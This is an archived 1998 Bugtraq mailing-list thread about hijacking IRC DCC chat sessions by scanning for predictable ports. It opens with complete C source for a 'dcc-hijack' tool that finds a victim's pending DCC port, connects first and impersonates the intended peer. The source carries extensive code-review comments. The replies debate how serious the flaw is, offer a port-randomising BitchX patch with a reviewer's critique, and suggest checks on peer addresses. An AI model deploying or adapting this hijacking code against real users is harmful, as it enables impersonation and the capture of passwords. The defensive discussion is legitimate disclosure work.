Date: Sat, 19 Dec 1998 13:58:04 +0100
From: awgn@COSMOS.IT
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Irc: another funny stuff. In some irc clients dcc may be hijacked.
I just found a funny bug playing with some irc-client. DCC-chat may be
hijacked...
The trouble comes while clients bind port to accept or request a dcc
CHAT/SEND/ or RECEIVE.
Being this a simple TCP connection without any ip control.. the way to
exploit is trivial.
Here we go:
B , the hi-jacker wants to have fun with A. So he first creates a dcc
connection with A,
getting the port binded.
Now A is under attack since next ports used to create connections will
be quite consecutive to the first one. BitchX and IRCepic seem to be
affected with this matter. ( other clients???)
Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a
bot? )
B , using the following source, is going to assume the identity of C
except for his host. :-)
I simply implemented some routines of my hailscan to guess which is the
port binded.
When it finds an open port, it establishes a connection running a kind of
irc-client.
All of this is just for educational purpose only.
The source provided herein can be improved for better results.
awgn@cosmos.it
coding&networking division.
[ Part 2: "Attached Text" ]
/* Dcc hijack (c) 1998 awgn@cosmos.it
*
* Some pieces of this code are ripped from hailscan v 1.9908.
* available at www.dislessici.org. ( hosted at cosmos.it )
*
* CREDITS: cosmos.it -> this isp r0x!!!! ( Thansk to spider@cosmos.it )
* kasko, antirez & gigi_sull @seclab.com
*
* GREETINGS: *@dislessici.org , #hackers@ircity rappo,filo,cyber,litos,lordfelix...
* Sir-Alex: take it easy... only God knows the truth ;-).
* Thor: everyone is missing you.
* Jwk, jam, zorro , c1rp0, megat0n -> how is going your parser ? ;)
*
* #hackers@undernet.org ( expecially to my buddy nigr zerox)
* #america@undernet.org ( dedicated to my bro' sartre, exx & jeanlucP )
* #hackers.it@ircnet ( m0f0z - radon - Nail^d0d )
*
* NERVOUS! -> how can i forget your nick? hehe
*
* Tested on Linux and *BSD.
*
* This code is provided for educational purposes only. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#define MAXSOCKET 32   /* number of probe slots scan() keeps in flight at once */
#define TIMEOUT 10     /* seconds before a pending probe is abandoned (see time_out()) */
/* Target address: scan() fills sin_addr/sin_family once and rewrites sin_port per probe. */
struct sockaddr_in newsock;
/* One probe slot of the singly linked list built in scan(). */
struct sweep {
int sock;    /* descriptor of the non-blocking socket, or 0 when the slot is free */
short port;  /* port this slot is probing; assigned from portcounter in push_sockets() */
long sec;    /* gettimeofday() stamp taken when the socket was created ... */
long usec;   /* ... used by time_out() to expire the probe */
struct sweep *next;  /* next slot; the last node has next == NULL and serves as end marker */
};
/* List cursor and list head; scan() resets sheet to top_sheet after each pass. */
struct sweep *sheet, *top_sheet;
int csock = 0;        /* not referenced anywhere else in this listing */
int portcounter;      /* next port to probe: seeded from argv[2] in main(), bumped by push_sockets() */
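/* Switch descriptor s into non-blocking mode.
 * Returns 0 on success and -1 if either fcntl() call fails (errno is left as
 * set by fcntl).  The original ignored the F_SETFL result, so a failure to
 * apply O_NONBLOCK went unnoticed. */
int
set_nonblock (int s)
{
    int flags = fcntl (s, F_GETFL, 0);
    if (flags == -1)
        return -1;
    if (fcntl (s, F_SETFL, flags | O_NONBLOCK) == -1)
        return -1;
    return 0;
}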
/* Report whether timestamp (sec_a, usec_a) lies more than time_max seconds
 * after (sec_b, usec_b).  Returns 1 when the whole-second difference exceeds
 * time_max, or equals it with a larger microsecond part; otherwise 0.
 * The microsecond fields are compared as given, without normalisation. */
int
time_out (long int sec_a, long int usec_a, long int sec_b, long int usec_b, int time_max)
{
    long int elapsed = sec_a - sec_b;

    if (elapsed > time_max)
        return 1;
    if (elapsed == time_max && usec_a > usec_b)
        return 1;
    return 0;
}
/* Arm the slot at the global cursor `sheet` if it is free: open a TCP socket,
 * make it non-blocking, stamp the creation time and take the next port from
 * portcounter.  Returns 1 when a probe was armed, 0 when the slot was already
 * busy or set_nonblock() failed.  As in the original, the socket() result is
 * not checked, so a -1 descriptor can be stored in the slot on failure. */
int
push_sockets (void)
{
    struct timeval stamp;

    gettimeofday (&stamp, NULL);
    if (sheet->sock)
        return 0;       /* slot already holds a live probe */

    sheet->sock = socket (AF_INET, SOCK_STREAM, 0);
    if (set_nonblock (sheet->sock) == -1)
        return 0;

    sheet->sec = stamp.tv_sec;
    sheet->usec = stamp.tv_usec;
    sheet->port = portcounter++;
    return 1;
}
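/* Resolve host (dotted quad or DNS name) to an IPv4 address in network byte
 * order.  Returns 0 when the host cannot be resolved, after printing a
 * diagnostic to stderr.  Note 0 is also the encoding of 0.0.0.0, so callers
 * cannot distinguish that address from failure (kept for compatibility).
 * Changes from the original: the copy out of hostent is bounded to the size
 * of in_addr instead of trusting h_length, memcpy() replaces the legacy
 * bcopy(), and the message no longer prints strerror(errno) — gethostbyname()
 * reports through h_errno, so errno was unrelated to the failure. */
u_long
getnbobyname (u_char * host)
{
    struct in_addr addr;
    struct hostent *host_ent;
    const char *name = (const char *) host;

    addr.s_addr = inet_addr (name);
    if (addr.s_addr == INADDR_NONE) {
        host_ent = gethostbyname (name);
        if (host_ent == NULL
            || host_ent->h_addrtype != AF_INET
            || host_ent->h_length != (int) sizeof addr.s_addr
            || host_ent->h_addr_list[0] == NULL) {
            fprintf (stderr, "gethostbyname() or inet_addr() err: cannot resolve %s\n", name);
            return 0;
        }
        memcpy (&addr.s_addr, host_ent->h_addr_list[0], sizeof addr.s_addr);
    }
    return addr.s_addr;
}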
/* Interactive relay over the connected descriptor s: lines read from the peer
 * are printed prefixed with "<str>", lines typed on stdin are forwarded to
 * the peer.  Never returns — the while(1) below has no exit, so the trailing
 * exit(0) is unreachable.
 * Behaviour worth knowing about (unchanged from the original):
 *  - fdopen()/setlinebuf() results are not checked;
 *  - set_nonblock(s) makes the socket non-blocking, so fgets(in) presumably
 *    returns NULL as soon as no data is pending and control falls through
 *    to the blocking fgets(stdin) — peer output is then only displayed once
 *    the user types a line (inferred from stdio semantics; confirm);
 *  - the fgets(stdin) return value is ignored: on EOF out_line is left as it
 *    was (uninitialised on the very first call), so the strlen() test reads
 *    stale or indeterminate bytes and the loop likely spins re-sending them;
 *  - bytes received from the peer are written to the terminal unfiltered. */
void
client (int s, char *str)
{
FILE *in, *out;
char in_line[1024];
char out_line[1024];
in = fdopen (s, "r");
out = fdopen (s, "a");
setlinebuf (in);
setlinebuf (out);
set_nonblock (s);
printf ("\nGotcha!\nDCC hijacked.\n\n\n");
while (1) {
/* drain whatever the peer has sent so far */
while (fgets (in_line, 1024, in))
printf ("<%s> %s", str, in_line);
/* return value unchecked; see header comment */
fgets (out_line, 1024, stdin);
if (strlen (out_line) > 1)
fprintf (out, "%s", out_line);
}
exit (0);
}
/* Print the banner and the usage line to stderr, then terminate the process
 * with exit status 1.  Does not return. */
void
usage (char *name)
{
    fprintf (stderr,
             "\ndcc-hijack (c) 1998 awgn@cosmos.it\n\n"
             "usage: %s host.of.dcc.asker baseport\n",
             name);
    exit (1);
}
/* Probe consecutive ports on host a (IPv4, network byte order — it is stored
 * into sin_addr unconverted) until one accepts a TCP connection; the connected
 * descriptor is stored in *out and the port in *port before returning.
 * There is no failure path: the outer while(1) is only left through those
 * returns, so the trailing return is unreachable and main()'s "no port found"
 * branch can effectively never trigger.
 * Resource handling, unchanged from the original: MAXSOCKET+1 list nodes are
 * malloc()ed without checking and never freed; a probe still pending after
 * TIMEOUT seconds is marked free (sock = 0) without close(), leaking one
 * descriptor per expired probe. */
void
scan (unsigned long int a, int *out, unsigned short int *port)
{
struct timeval now;
int i = 0;
*out = 0;
*port = 0;
/* Build MAXSOCKET working slots plus one trailing node whose next is NULL;
 * the inner while(sheet->next) uses that node as the end-of-list marker. */
sheet = (struct sweep *) malloc (sizeof (struct sweep));
top_sheet = sheet;
for (; i < MAXSOCKET; i++) {
sheet->sock = 0;
sheet->next = (struct sweep *) malloc (sizeof (struct sweep));
sheet = sheet->next;
sheet->next = NULL;
}
sheet = top_sheet;
newsock.sin_addr.s_addr = a;
newsock.sin_family = AF_INET;
while (1) {
while (sheet->next) {
gettimeofday (&now, NULL);
if (!sheet->sock)
/* free slot: open a non-blocking socket for the next port */
push_sockets ();
else {
if (time_out (now.tv_sec, now.tv_usec, sheet->sec, sheet->usec, TIMEOUT))
/* expired: slot is freed but the descriptor is never closed */
sheet->sock = 0;
else {
newsock.sin_port = htons ((u_short) sheet->port);
/* connect() is re-issued on the non-blocking socket each pass until it
 * completes (0 or EISCONN) or fails with one of the errnos listed below;
 * any other errno (EINPROGRESS, EALREADY, EBADF, ...) leaves the probe
 * pending until it completes or times out. */
if (connect (sheet->sock, (struct sockaddr *) &newsock, sizeof (newsock)) == 0) {
*out = sheet->sock;
*port = sheet->port;
return;
} else
switch (errno) {
case EISCONN:
*out = sheet->sock;
*port = sheet->port;
return;
/* unreachable after return */
break;
case ETIMEDOUT:
case EINVAL:
case ECONNREFUSED:
case EADDRNOTAVAIL:
/* definite failure: release the slot so push_sockets() reuses it */
close(sheet->sock);
sheet->sock=0;
break;
}
}
}
sheet = sheet->next;
}
/* one pass over all slots done; start again from the head */
sheet = top_sheet;
}
return;
}
/* Entry point: argv[1] is the host to probe, argv[2] the first port.
 * Resolves the host, seeds portcounter, runs scan() and hands the resulting
 * descriptor to client().  Exits 1 on usage, resolution or port errors.
 * Notes on the argument handling (unchanged from the original):
 *  - the resolved address is cast to u_long and stored in an int; on LP64 an
 *    address with its top bit set becomes negative and is sign-extended when
 *    passed to scan(), but scan() only keeps the low 32 bits in s_addr, so the
 *    address itself survives — only the !nb0 test relies on the truncation;
 *  - a value of 0 from getnbobyname() means either failure or 0.0.0.0;
 *  - atoi() performs no range check; the port ends up in a `short` slot field. */
int
main (int argc, char **argv)
{
int nb0 = 0;
int sock = 0;
unsigned short port_guessed = 0;
if (argc < 3)
usage (argv[0]);
if (!(nb0 = (u_long) getnbobyname ((char *) argv[1]))) {
fprintf (stderr, "argv[1] err: which kind of host/ip did you pass me?\n");
exit (1);
}
if (!(portcounter = atoi (argv[2]))) {
fprintf (stderr, "port() err: which kind of port did you pass me?\n");
exit (1);
}
scan (nb0, &sock, &port_guessed);
/* scan() never returns without a connected socket, so this branch is
 * effectively dead code. */
if (!sock || !port_guessed) {
fprintf (stderr, "Sorry: no port found.\nDCC between clients may be already estabilished.\n");
exit (1);
}
client (sock, argv[1]);
return 0;
}
--------------------------------------------------------------------------
Date: Sun, 20 Dec 1998 10:35:43 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may be hijacked. (fwd)
---------- Forwarded message ----------
Received: from BlackHole.RainNet.Org (rain@BlackHole.RainNet.Org [192.168.1.3])
by Portal.RainNet.Org (8.8.8/8.8.8/Debian/GNU) with ESMTP id KAA26632
for <rain@portal.RainNet.Org>; Sun, 20 Dec 1998 10:31:10 -0500
Received: from listopher.concentric.net (listopher.concentric.net
[206.173.119.117])
by BlackHole.RainNet.Org (8.8.5/8.8.5) with ESMTP id KAA13517
for <rain@insane.loonybin.net>; Sun, 20 Dec 1998 10:31:23 -0500
Received: (from majordom@localhost)
by listopher.concentric.net (8.8.3/8.8.5)
id KAA21767; Sun, 20 Dec 1998 10:06:15 -0500 (EST)
Message-ID: <199812201506.JAA27379@nemesis.acronet.net>
To: ircii-epic@concentric.net
Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may
be hijacked.
In-Reply-To: Your message of "19 Dec 1998 22:17:00 +0200."
<77AMlEdphjB@kl.Snafu.DE>
Date: Sun, 20 Dec 1998 09:06:07 -0600
>From: Jeremy Nelson <jnelson@acronet.net>
Sender: owner-ircii-epic@concentric.net
Precedence: bulk
>I just found a funny bug playing with some irc-client. DCC-chat may be
>hijacked...
This is not a bug in the client. It is a function of the operating system.
For example, this ``bug'' is not present in OpenBSD because it hands out
ports randomly.
>The trouble comes while clients bind port to accept or request a dcc
>CHAT/SEND/ or RECEIVE. Being this a simple TCP connection without any ip
>control.. the way to exploit is trivial.
This is preposterous. The client informs you of the remote IP address
connecting. Any half-aware user checks the IP address to make sure
that it is reasonable.
>Here we go:
>
>B , the hi-jacker wants to have fun with A. So he first creates
>a dcc connection with A, getting the port binded.
>
>Now A is under attack since next ports used to create connections will
>be quite consecutive to the first one. BitchX and IRCepic seem to be
>affected with this matter. ( other clients???)
>
>Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a
>bot? ) B , using the following source, is going to assume the identity of C
>except for his host. :-)
Folks, this is completely preposterous. This "exploit program" is nothing
more than a limited-range port scanner. What this "exploit" boils down
to is:
"If you establish a DCC connection with me, then if I port-scan
you later between when you offer a DCC and when it is received,
I will be able to connect to your DCC offer."
Well, duh. You could just turn this into a full-blown scanner and scan all
day for DCC connections if thats what you wanted to accomplish, and even
such a scanner as that would work on OpenBSD, where ports are handed out
randomly.
Folks, this is not a bug, except to the extent that you completely ignore
the IP address on your established DCC transactions. If its not the right
IP, close it and try again. And email the abuse contact of the offending
ISP about how their users are port scanning you.
Sheesh.
Jeremy
--------------------------------------------------------------------------
Date: Sun, 18 Oct 1998 19:50:48 +0200
From: Alessio Orlandi <nailtbt@TIN.IT>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: DCC HiJacking patch for BitchX 75p1
Parts/Attachments:
1 Shown 26 lines Text
2 Shown 20 lines Text
----------------------------------------
Hi all,
as recently discovered, with a simple port scan you can hijack some
of the BitchX dcc
connections. This is due to the port assignment on the requesting client.
Here follows a really short patch that will fix the problem. The problem
is here:
BitchX when creates a DCC connection (listening socket) uses the
functions
connect_by_number (defined in network.c file). Passing as port 0
This means that the OS will determine the port. Now.. for mental order..
the ports will be quite consecutive. Bad.. Bad... So.. let's add a
random value to the port returned by the system. All is now fixed.
Patch follows
-----------------------------------------------------------------------------------------
Regards
Alessio
"NaiL^d0d@ircnet/ircity" Orlandi
Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
awgn (hehe),
Lordfelix (salam), Raptor,
BlackJam, kasko, antirez
and hackers.it@ircnet Soren, NaiF, Bonjo
----------------------------------------------------------------------------------------
[ Part 2: "Attached Text" ]
--- source/network.c
+++ source/network.c 1998/7/20 08:56:44
@@ -21,7 +21,9 @@
#ifdef HAVE_SYS_FILIO_H
#include <sys/filio.h>
#endif
+/* NaiL^d0d: no hijack please, we need random bytes, in stdlib.h */
+#include <stdlib.h>
extern char hostname[NAME_LEN+1];
extern int use_socks;
@@ -172,6 +172,7 @@
memset(&name, 0, sizeof(struct sockaddr_in));
name.sin_family = AF_INET;
name.sin_addr.s_addr = htonl(INADDR_ANY);
name.sin_port = htons(*portnum);
+name.sin_port+=(unsigned short)(rand() &255);
if (bind(fd, (struct sockaddr *)&name, sizeof(name)))
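Review bot: The random offset on the added line is applied after `htons()`, so on a little-endian host it perturbs the high-order byte of the wire port — the bound port moves in steps of 256 and can wrap past 65535 — and it is applied even when the caller passed a nonzero `*portnum` asking for a specific port. The arithmetic belongs before the byte swap and should leave an explicit port request alone, e.g. `name.sin_port = htons((unsigned short)(*portnum + (*portnum ? 0 : (rand() & 255))));` in place of the two `sin_port` lines. Even then, with `*portnum == 0` the result lies in 0–255, where 0 keeps the kernel-assigned behaviour and the rest are privileged ports, so the base of the offset needs choosing as well. The enclosing function (named `connect_by_number` in the description) starts and ends outside the hunk, so whether `*portnum` is reported back to the caller cannot be checked here.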
--------------------------------------------------------------------------
Date: Mon, 21 Dec 1998 16:33:30 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
# Hi all,
# as recently discovered, with a simple port scan you can hijack some
# of the BitchX dcc
# connections. This due to the port assigning on the requesting client.
# Here follows a really short patch that will fix the problem. The problem
# is here:
# BitchX when creates a DCC connection (listening socket) uses the
# functions
# connect_by_number (defined in network.c file). Passing as port 0
# This means that the OS will determine the port. Now.. for mental order..
# the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
# random value to the port returned by the system. All is now fixed.
# Patch follows
# -----------------------------------------------------------------------------------------
#
# Regards
# Alessio
# "NaiL^d0d@ircnet/ircity" Orlandi
# Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
# awgn (hehe),
# Lordfelix (salam), Raptor,
# BlackJam, kasko, antirez
# and hackers.it@ircnet Soren, NaiF, Bonjo
# ----------------------------------------------------------------------------------------
#
#
#
This patch won't work-- what if a port you decide on is already in use by
something else?
Ben
--------------------------------------------------------------------------
Date: Mon, 21 Dec 1998 16:27:13 -0500
From: Andy Dills <andy@SS5.XECU.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
> the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
> random value to the port returned by the system. All is now fixed.
> Patch follows
Your patch changes the order, but there is still order.
You need to call srand() once before using rand, to ensure actual
randomness.
Andy
--
System Administrator
XecuNet Internet Services
--------------------------------------------------------------------------
Date: Tue, 22 Dec 1998 18:48:43 -0600
From: mikey <mikey@PHEDZ.COM>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
Yes, this might help. But why worry? they would need to port scan, and
find the port quicker than the other client can connect. Do you think they
can do this all the time? Or Barely ever? So this is not a problem, I
don't understand why anyone even got jumpy over it. I could do the same
with ftp, ftp opens ports waiting to receive files. Do you see people
making patches for that?
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
> Hi all,
> as recently discovered, with a simple port scan you can hijack some
> of the BitchX dcc
> connections. This due to the port assigning on the requesting client.
> Here follows a really short patch that will fix the problem. The problem
> is here:
> BitchX when creates a DCC connection (listening socket) uses the
> functions
> connect_by_number (defined in network.c file). Passing as port 0
> This means that the OS will determine the port. Now.. for mental order..
> the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
> random value to the port returned by the system. All is now fixed.
> Patch follows
> -----------------------------------------------------------------------------------------
>
> Regards
> Alessio
> "NaiL^d0d@ircnet/ircity" Orlandi
> Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
> awgn (hehe),
> Lordfelix (salam), Raptor,
> BlackJam, kasko, antirez
> and hackers.it@ircnet Soren, NaiF, Bonjo
> ----------------------------------------------------------------------------------------
--------------------------------------------------------------------------
Date: Tue, 22 Dec 1998 15:41:26 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: Ircii-epic: about dcc hijacking... (fwd)
To: ircii-epic@concentric.net
Subject: Re: Ircii-epic: about dcc hijacking... (fwd)
In-Reply-To: Your message of "Mon, 21 Dec 1998 16:30:59 EST."
<Pine.LNX.4.03.9812211630450.22325-100000@Portal.RainNet.Org>
Date: Tue, 22 Dec 1998 10:31:31 -0600
>From: Jeremy Nelson <jnelson@acronet.net>
Sender: owner-ircii-epic@concentric.net
Precedence: bulk
>Heya, I did not say that dcc-hijack.c is more than a simple tcp
>portscanner, so this is not so preposterous as you wrote.
What I thought was preposterous is that you presented this as some kind of
serious problem.
>Then if you read my post with attention you can't find anything absurde.
No comment.
>More, it could not be a `bug', anyway we can easly patch irc-client to
>bind random port.
This won't change the problem since you can still port-scan a wider range
to pick up the random ports. This kind of stuff is best left to the
operating system.
Your "exploit" only works when:
1) Someone either accepts or initiates a dcc transaction with an
untrusted party.
2) During the time that the untrusted party runs the port scanner, the
DCC transaction is the one and only transaction that is pending. If,
for example, someone is doing a FTP, then you could just as well pick up
one of their PORT commands rather than a DCC listen.
3) The untrusted party runs the port scanner between when the person
initiates the latter DCC CHAT and when the latter DCC CHAT is accepted.
(Race condition)
4) The person does not double-check the IP address on the latter DCC CHAT
to see if it is reasonable.
>Which is your point of view? hehe
My point of view is that one should write a script to hook /on dcc_offer,
dispatch a userhost or userip (depending on your network) to retrieve the
hostname of the person you are soliciting for a dcc transaction. When that
hostname information comes back, stash it in a variable. When the DCC is
accepted, if the hostname information has not come back, 'wait'. If it
has come back, then check $2 (or whatever) against the IP address of the
person you are interested in. If its not the same, chances are you have
a conflict to look at.
An alternative solution for those who are lazy is to keep a "moving" variable
that holds open a DCC RAW port over the last few DCC's you have offered.
Something that hooks /on dcc_offer and then does a $listen() to fool the
port scanner into connecting to the $listen() socket would be sufficient.
One must be careful to close their fd's though when theyre done.
I do not feel that the random binding of ports offers anything useful
above and beyond the current mechanism. If you are interested in
implementing either of the above, then i would be most appreciative and
interested in your work...
Jeremy
--------------------------------------------------------------------------
Date: Tue, 22 Dec 1998 13:48:06 -0500
From: YounGoat <youngoat@ALFHEIM.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
I can see this being exploited. I'll give you an example. You have A who is
trying to hijack B's DCC to C who is a bot.
A dcc chat's B. (he gets the port that that B uses. And gives that to
his hijack program which will then go through the next 150 ports or so over and
over)
A asks B if he is able to DCC chat the bot C. And asks B to try.
When B tries to dcc the bot, guess who is right there ready to connect to B and
give him a "Enter your password." prompt?
This is not meant to be a guide for script kiddies, but I do believe this is
certainly a problem, and the only sure fix is to check the hostname of the
person connecting or use a password that is given during the DCC request for
authentication. Since the latter would involve changing the IRC protocol, I'd
say irc clients are just going to have to verify that the right person is
connecting. With that, the worst thing that could happen is that somebody
could keep connecting and the irc client would keep rejecting him, possibly
causing a DOS.
----------------------------------
E-Mail: YounGoat <youngoat@alfheim.net>
Date: 22-Dec-98
Time: 13:39:09
This message was sent by XFMail
----------------------------------